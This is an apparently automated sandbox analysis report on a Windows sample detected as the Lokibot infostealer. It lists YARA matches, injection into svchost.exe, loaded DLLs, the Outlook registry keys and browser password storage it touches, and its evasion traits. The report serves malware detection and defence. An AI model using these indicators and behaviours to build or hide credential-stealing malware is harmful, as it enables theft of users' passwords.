Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@1/1

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B4A06A GetLastError,FormatMessageW,

0_2_00B4A06A

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B381CB AdjustTokenPrivileges,CloseHandle,	0_2_00B381CB
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00B387E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	1_2_0040650A

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B4B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B4B3FB

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B5EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B5EE0D

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B583BB

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00AE4E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00D93360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00D93360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\vsf098633534.exe

File created: C:\Users\user\AppData\Local\Temp\aut1863.tmp

Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe	Command line argument: X		0_2_00AE47D0
Source: C:\Users\user\Desktop\vsf098633534.exe	Command line argument: X		0_2_00AE47D0

Source: vsf098633534.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vsf098633534.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000001.00000003.1676081106.0000000005245000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: vsf098633534.exe	Virustotal: Detection: 30%
Source: vsf098633534.exe	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\vsf098633534.exe "C:\Users\user\Desktop\vsf098633534.exe"
Source: C:\Users\user\Desktop\vsf098633534.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"
Source: C:\Users\user\Desktop\vsf098633534.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"	Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: vsf098633534.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: vsf098633534.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp

Source: vsf098633534.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: vsf098633534.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: vsf098633534.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: vsf098633534.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: vsf098633534.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE4B37 LoadLibraryA,GetProcAddress,

0_2_00AE4B37

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4848F push FFFFFF8Bh; iretd	0_2_00B48491
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0E70F push edi; ret	0_2_00B0E711
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0E828 push esi; ret	0_2_00B0E82A
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B08945 push ecx; ret	0_2_00B08958
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0EAEC push edi; ret	0_2_00B0EAEE
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0EA03 push esi; ret	0_2_00B0EA05
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00D93360

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00AE48D7
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00B65376

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B03187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B03187

Source: C:\Users\user\Desktop\vsf098633534.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vsf098633534.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\vsf098633534.exe

API/Special instruction interceptor: Address: CE3234

Source: C:\Users\user\Desktop\vsf098633534.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-106329

Source: C:\Users\user\Desktop\vsf098633534.exe

API coverage: 6.1 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 7104

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B4445A
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4C6D1 FindFirstFileW,FindClose,	0_2_00B4C6D1
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B4C75C
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B4EF95
